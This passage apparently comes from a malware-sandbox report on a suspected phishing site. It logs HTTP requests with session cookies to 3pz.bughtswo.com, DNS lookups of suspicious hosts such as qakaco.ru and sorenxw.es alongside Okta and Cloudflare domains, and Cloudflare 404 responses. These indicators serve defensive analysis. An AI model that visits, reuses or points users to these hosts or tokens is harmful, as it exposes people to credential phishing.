XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /opyYQhzf6pW8TXFXX4aHCJLltYOpZ9gZxhstvZonqoZbKeJY8p18pl4GSjlC7bkgJBIycd240 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /uvrsNwJ0EBQ2dDGQwRbWOzn8AryE2uANKhJMqeuKmnccZhFbpNDM77XT7xoGTEiBeNLNv8SREeVj0l5gh260 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /klenjbRJbkmC9A5K6h8dlPsIojwX4ImnFqvwxZ7prt4wHIGzEyU78167 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /efBjX2yOm7GgfZp7ySyVTDijLhRc5kO0DER2eibNKXblerN790150 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /wxp9c6hIYkZlyZ86ciJJym3vOmghEsersSKv43s9kEMB4L7S90180 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /opCFdSgn1l9ejFMcZdMMdllPgt3wr0qvg5ghQ19r8NjVY4Vg9HKNBQfcd200 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /ijjsoowXvipoSRdLsikOWGMMRfyP4mdeXkl14Vx3gpVt9nneix52sKmQK11HVfv3Pb12201 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /opyYQhzf6pW8TXFXX4aHCJLltYOpZ9gZxhstvZonqoZbKeJY8p18pl4GSjlC7bkgJBIycd240 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /uvrsNwJ0EBQ2dDGQwRbWOzn8AryE2uANKhJMqeuKmnccZhFbpNDM77XT7xoGTEiBeNLNv8SREeVj0l5gh260 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgrYnJ4OTA3MzJDZWpXRW9ZbDhVV0E9PSIsInZhbHVlIjoibEZGK0RUa2szL3U4K0pTdHVrSFlEOFBHM1VUYlFLeC92dkRCazcxZ1grdUVHVjR6djAzNFNjaUEzWEtVTWZzb1k5eFh3KzFmbkVrNFBIZzNnQXJjQ2hOUzVxbWpsZVJqQ2d6bm9iNWpkUkhWQVlnTFlGbEdSN1MzWm1pL0taUTgiLCJtYWMiOiJiZmNjYjk3MmI3YTBmYWUwYzFmNjA2YTFlZjhiMmJmYzJiNGQ3MjhhM2Q0Zjc1NGFkMzhhODE4MjEyN2JmNmVmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJTcSt0YVZIeERTTUtpclIvdENBQmc9PSIsInZhbHVlIjoiOXU2MmtZa3dPdmtQQVNlTzhEa1RGMWxKRXVPWFg0UGZzN0pId2tsaUNFRmhuRVVJYW9WYWkwUWEyWGh3cWNwWjl2RzFkd1Y5UUdFZmlCcWd2S3dqeUJJQ2tlSTZ1N2kwSkFLcDQ2YjY4YjJkRmNoQVlMaGU4WkU2cG5OZCs0ZkoiLCJtYWMiOiI5MzMzOWJiYmVjN2EzZGViOGUzNGE2OTM0ZGY4YThmYzJmOGZlMzRhMDc3M2Y5NDJkYWI3NjJhMDQ3YTAzM2YzIiwidGFnIjoiIn0%3D

Source: global traffic	DNS traffic detected: DNS query: 3pz.bughtswo.com
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: developers.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: rxivb5.qakaco.ru
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: ok4static.oktacdn.com
Source: global traffic	DNS traffic detected: DNS query: objects.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: get.geojs.io
Source: global traffic	DNS traffic detected: DNS query: y0wwlcczroc2mikkx8azepa6tnnyjj1ifs5xawhcmienblrzuz6qcrs.sorenxw.es
Source: global traffic	DNS traffic detected: DNS query: r7hi.qakaco.ru

Source: unknown

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Mar 2025 00:54:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BUIoZMPRG8vNPXrCaUHRFNpOxoO0llmdTlI9mVFobnQAOUWQnaXEQlVSnhAlaQmc5PjrqdLzlhpkoxEhnWwQp8nObmN2xhfYGOFErumcN6nGbNNZXiWmUrbruaLH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=25508&min_rtt=25474&rtt_var=9577&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2049&delivery_rate=111800&cwnd=32&unsent_bytes=0&cid=877e04fe5b75827c&ts=203&x=0"Server: cloudflareCF-RAY: 9220c2f3f9ce424b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1895&min_rtt=1888&rtt_var=722&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1713&delivery_rate=1502057&cwnd=196&unsent_bytes=0&cid=9bf50957e8a4b790&ts=455&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Mar 2025 00:54:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: EXPIREDAge: 124Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sVzePvwRjXXlW0DtY2JbYIaIFED%2FFzH6NDzh%2BDJPERrqfPGrhYPYDYS%2Bl%2FyKAR2TueoQvBI8Hny2nXo9xIHspToLbZ1aCk3HlOSoHRaqV%2B6yPV%2Bpvznx8Ya%2B7jsh"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingserver-timing: cfL4;desc="?proto=TCP&rtt=25554&min_rtt=25484&rtt_var=9697&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2231&delivery_rate=109336&cwnd=32&unsent_bytes=0&cid=e06348e6ee44e26a&ts=45&x=0"Cache-Control: max-age=14400Server: cloudflareCF-RAY: 9220c2f7fd7eb89f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2846&min_rtt=2842&rtt_var=1069&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1895&delivery_rate=1027445&cwnd=239&unsent_bytes=0&cid=9f686fdc4399a650&ts=300&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Mar 2025 00:54:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w3JhBcvqOKOhlWS1PgWwqtauVvLf5cbPAHVtEYOT3g5C2gcIW4d%2BlayGptHy3T3U3uX07F8tA9Sa8xV7svZJae4ybmqo5w67fAJGOpO51GMr9D5MtViPSP3uv2b8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=26001&min_rtt=26000&rtt_var=9752&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2052&delivery_rate=109504&cwnd=32&unsent_bytes=0&cid=c5aa27dc89f54b0a&ts=202&x=0"Server: cloudflareCF-RAY: 9220c2fadc57566e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2089&min_rtt=2077&rtt_var=803&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1716&delivery_rate=1343764&cwnd=95&unsent_bytes=0&cid=9c8c0afe7265aaa8&ts=476&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Mar 2025 00:55:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U8VUuRb2jU156aiG%2F7YeVZhjSKP45Jt3JENULp4gBO8UdlTC3lvvcRtsdaXjIvAYSc4fciUjCEkq00VyFnEclnE0r6lfBDBIuDec0OVSmtHZsYYI%2FclkPDn2%2FzXS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=25590&min_rtt=25568&rtt_var=7230&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2061&delivery_rate=110955&cwnd=32&unsent_bytes=0&cid=15a30ed7a6143bf6&ts=217&x=0"Server: cloudflareCF-RAY: 9220c31468fede92-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1577&rtt_var=617&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1727&delivery_rate=1737061&cwnd=226&unsent_bytes=0&cid=c9b7c05d6c0b4fce&ts=478&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Mar 2025 00:55:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=USRuf0s1CZ4S0PBwdFn1KdjczBeiTGuaeY0uxaBVbfSIQhF612ZwPd2ogcLioNJ1B7KPfncQPmymRpVJfhfgmcDoPxHFZJWrBtaA2hPuhASm8EkZkl2MqunS9a95"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=27010&min_rtt=27006&rtt_var=10130&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2036&delivery_rate=105458&cwnd=32&unsent_bytes=0&cid=f3ed67058bf55a66&ts=190&x=0"Server: cloudflareCF-RAY: 9220c4447feb7095-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2456&min_rtt=2456&rtt_var=922&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1700&delivery_rate=1186509&cwnd=186&unsent_bytes=0&cid=9966a479b18e7c7a&ts=458&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Mar 2025 00:55:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mYpf7rwrS6WxSjb5a%2FAaQ7fOP444pmOxjYMdns8SSp7Whk9yGgndKYH7kH6IyFfD8NQqyrd6lpKGP3G7AKTI6ivOogr0keilWW0XX6WwiA%2FEtZLw9Hz%2F8MEptDkm"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=25550&min_rtt=25538&rtt_var=9600&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2045&delivery_rate=111102&cwnd=32&unsent_bytes=0&cid=2de27d735b533d03&ts=193&x=0"Server: cloudflareCF-RAY: 9220c44d789a5f83-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1658&min_rtt=1651&rtt_var=633&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1709&delivery_rate=1708601&cwnd=131&unsent_bytes=0&cid=30f25a8c383311a6&ts=458&x=0"
